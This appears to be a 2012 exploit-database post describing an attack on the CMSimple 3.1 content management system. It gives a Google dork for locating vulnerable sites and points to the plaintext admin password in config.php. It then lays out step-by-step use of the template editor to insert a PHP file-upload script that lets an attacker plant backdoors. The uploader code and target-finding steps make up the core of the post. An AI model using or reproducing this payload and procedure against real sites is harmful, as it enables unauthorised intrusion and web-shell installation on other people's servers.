CMSimple version 3.1 PHP Code disclource
2012-09-17 21:45:53Posted by: dementor
#############################################################
# Exploit Title: CMSimple version 3.1 PHP Code disclource
# Google Dork: Powered By CMSimple.dk
# Date: 18/09/2012
# Exploit Author: Mr.Dementor
# Homepage : http://www.magetan-it.org/
# Contact : [email protected]
# Vendor Homepage: http://www.cmsimple.dk/, http://www.dotcomwebdesign.com/
# Version: 3.1
# Tested on: Win7
##############################################################
#SOFTWARE DESCRIPTION :
-----------------------
CMSimple version 3.1 - Jun 2008
Small - simple - smart
- IMPORTANT NOTICE: As covered by the AGPL Section 2(d), the "Powered by CMSimple"-link to cmsimple.dk must under no circumstances be removed from pages generated by this program (except in print facility). If you want to remove or hide this link from your pages, you must purchase CMSimple under a commercial license. This also applies testing purposes and setup at an intranet or internal network.
- Please be aware, that the AGPL in Section 2(d) requires, that any modified version of the program runned public (ie. on the Internet) must have an additional download facility for the modified version. This also applies to any modification of the template. Therefore you should purchase a commercial license, if you do not want the design of your internet site to fall under the AGPL license.
- For further information about this license and how to purchase a commercial license, please see http://www.cmsimple.dk/?License
- For downloads and information about installation, please see http://www.cmsimple.dk
#PROOF OF CONCEPT :
-------------------
1. Login to admin panel
Important : The password have not saved on the database, look at the piece of config.php script
#############################################
<?php
$cf['security']['password']="somepassword";
$cf['security']['type']="page";
$cf['site']['title']="some tittle";
$cf['site']['template']="template_name";
$cf['language']['default']="en";
#############################################
so, if you are not administrator, you can find the original password, unless you get a code from another ways ( symlink or jumping server ).
2. Go to editor template at http://some.target/?file=template&action=edit
The following screenshots illustrate reading the contents of template ( *.php ) and edit the script with uploader form.
simple uploader script :
#########################################
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if($_POST['_upl'] == "Upload"){
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {echo'upload sukses';} else {echo 'gagal bro';}
}
?>
#########################################
Step 1: http://2.bp.blogspot.com/-swfpoRh2XCg/UFd6Td8rb6I/AAAAAAAAAqc/Vjdcll9KZHo/s1600/edit.png
Step 2: http://4.bp.blogspot.com/-ft6YlZWYz8M/UFd7Tg8kC6I/AAAAAAAAAqo/t4B9mrvElKY/s1600/uploadform.png
3. Save all of your changes and its work :)
#WHAT IS THE RISK ?
-------------------
This feautre (template editor) allow some attacker to edit php source, include some backdoor etc without MiTM or access Control Panel.
#############################
# Special thanks for : BL4cKc0d1n6
# Best Greats : Handi Eko Saputro
# Greats : tiaNG_jaWI , aSU_aBANG, Cybertaziex, Detol SevenCrew, De Vinclous, Dany Artha, BL4cKc0d1n6, Shadow Banditz.
#############################
Fixes
No fixesIn order to submit a new fix you need to be registered.